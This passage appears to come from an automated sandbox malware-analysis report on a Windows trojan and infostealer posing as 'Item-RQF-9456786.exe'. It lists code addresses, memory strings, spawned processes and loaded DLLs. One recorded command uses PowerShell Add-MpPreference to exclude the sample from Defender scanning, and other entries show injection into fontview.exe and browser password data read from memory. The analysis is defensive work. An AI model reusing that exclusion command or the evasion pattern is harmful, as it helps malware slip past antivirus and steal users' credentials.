    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FEB1B010_2_04FEB1B0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FCF17210_2_04FCF172
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0508F0CC10_2_0508F0CC
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050970E910_2_050970E9
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509F0E010_2_0509F0E0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FD010010_2_04FD0100
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509132D10_2_0509132D
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FFB2C010_2_04FFB2C0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509A35210_2_0509A352
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE52A010_2_04FE52A0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0502739A10_2_0502739A
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050A03E610_2_050A03E6
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FEE3F010_2_04FEE3F0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0508027410_2_05080274
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FCD34C10_2_04FCD34C
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050812ED10_2_050812ED
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FD0CF210_2_04FD0CF2
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05091D5A10_2_05091D5A
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05097D7310_2_05097D73
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE0C0010_2_04FE0C00
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FDADE010_2_04FDADE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05059C3210_2_05059C32
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FFFDC010_2_04FFFDC0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FF8DBF10_2_04FF8DBF
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05080CB510_2_05080CB5
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE3D4010_2_04FE3D40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509FCF210_2_0509FCF2
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FEAD0010_2_04FEAD00
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509FF0910_2_0509FF09
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05022F2810_2_05022F28
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05000F3010_2_05000F30
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05054F4010_2_05054F40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE9EB010_2_04FE9EB0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FF2E9010_2_04FF2E90
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE0E5910_2_04FE0E59
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509FFB110_2_0509FFB1
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FECFE010_2_04FECFE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509EE2610_2_0509EE26
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FD2FC810_2_04FD2FC8
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE1F9210_2_04FE1F92
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509CE9310_2_0509CE93
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509EEDB10_2_0509EEDB
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE38E010_2_04FE38E0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FC68B810_2_04FC68B8
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050AA9A610_2_050AA9A6
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE284010_2_04FE2840
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FEA84010_2_04FEA840
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0504D80010_2_0504D800
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE29A010_2_04FE29A0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FF696210_2_04FF6962
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE995010_2_04FE9950
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FFB95010_2_04FFB950
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0500E8F010_2_0500E8F0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509AB4010_2_0509AB40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FDEA8010_2_04FDEA80
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509FB7610_2_0509FB76
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05096BD710_2_05096BD7
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0501DBF910_2_0501DBF9
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509FA4910_2_0509FA49
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05097A4610_2_05097A46
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05053A6C10_2_05053A6C
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FFFB8010_2_04FFFB80
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05025AA010_2_05025AA0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0507DAAC10_2_0507DAAC
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0508DAC610_2_0508DAC6
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03011E4010_2_03011E40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300B12410_2_0300B124
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030136BC10_2_030136BC
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030136C010_2_030136C0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030154B010_2_030154B0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300CF6010_2_0300CF60
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300AFE010_2_0300AFE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300CD3710_2_0300CD37
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300CD4010_2_0300CD40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0302BC4010_2_0302BC40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04EBE66D10_2_04EBE66D
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04EBD73810_2_04EBD738
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04EBE2D810_2_04EBE2D8
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04EBC9F310_2_04EBC9F3
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CE541D11_2_04CE541D
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CEF7A911_2_04CEF7A9
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04D05F3911_2_04D05F39
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CE703911_2_04CE7039
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CE703011_2_04CE7030
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CED9B911_2_04CED9B9
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CED9B511_2_04CED9B5
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CEC13911_2_04CEC139
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CE52D911_2_04CE52D9
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CE725911_2_04CE7259
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: String function: 0179B970 appears 275 times
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: String function: 017E5130 appears 57 times
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: String function: 0182F290 appears 105 times
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: String function: 017F7E54 appears 101 times
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: String function: 0181EA12 appears 86 times
    Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 05015130 appears 36 times
    Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 0505F290 appears 105 times
    Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 04FCB970 appears 266 times
    Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 0504EA12 appears 84 times
    Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 05027E54 appears 88 times
    Source: Item-RQF-9456786.exe, 00000000.00000002.2271370211.0000000002A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000000.00000002.2290482107.0000000007590000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000000.00000000.2259200475.00000000004E4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamextjX.exe* vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000000.00000002.2271370211.0000000002A46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000000.00000002.2270734799.0000000000B2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000000.00000002.2287993204.0000000006D40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000005.00000002.2565556975.000000000189D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFONTVIEW.EXEj% vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFONTVIEW.EXEj% vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exeBinary or memory string: OriginalFilenamextjX.exe* vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Item-RQF-9456786.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, rf329e9anUujL1N2Fn.csSecurity API names: _0020.SetAccessControl
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, rf329e9anUujL1N2Fn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, rf329e9anUujL1N2Fn.csSecurity API names: _0020.AddAccessRule
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, Rl3VgVQKcLZDKcmexA.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, Rl3VgVQKcLZDKcmexA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, rf329e9anUujL1N2Fn.csSecurity API names: _0020.SetAccessControl
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, rf329e9anUujL1N2Fn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, rf329e9anUujL1N2Fn.csSecurity API names: _0020.AddAccessRule
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, Rl3VgVQKcLZDKcmexA.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, Rl3VgVQKcLZDKcmexA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@18/14
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Item-RQF-9456786.exe.logJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5esf122w.kax.ps1Jump to behavior
    Source: Item-RQF-9456786.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: Item-RQF-9456786.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: fontview.exe, 0000000A.00000002.4740849571.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOIN0;0
    Source: fontview.exe, 0000000A.00000002.4740849571.0000000003351000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2744483253.0000000003324000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2747090913.000000000332D000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4740849571.0000000003324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: Item-RQF-9456786.exeReversingLabs: Detection: 39%
    Source: unknownProcess created: C:\Users\user\Desktop\Item-RQF-9456786.exe "C:\Users\user\Desktop\Item-RQF-9456786.exe"
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe"
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess created: C:\Users\user\Desktop\Item-RQF-9456786.exe "C:\Users\user\Desktop\Item-RQF-9456786.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeProcess created: C:\Windows\SysWOW64\fontview.exe "C:\Windows\SysWOW64\fontview.exe"
    Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess created: C:\Users\user\Desktop\Item-RQF-9456786.exe "C:\Users\user\Desktop\Item-RQF-9456786.exe"Jump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeProcess created: C:\Windows\SysWOW64\fontview.exe "C:\Windows\SysWOW64\fontview.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: iconcodecservice.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: ieframe.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: propsys.dllJump to behavior
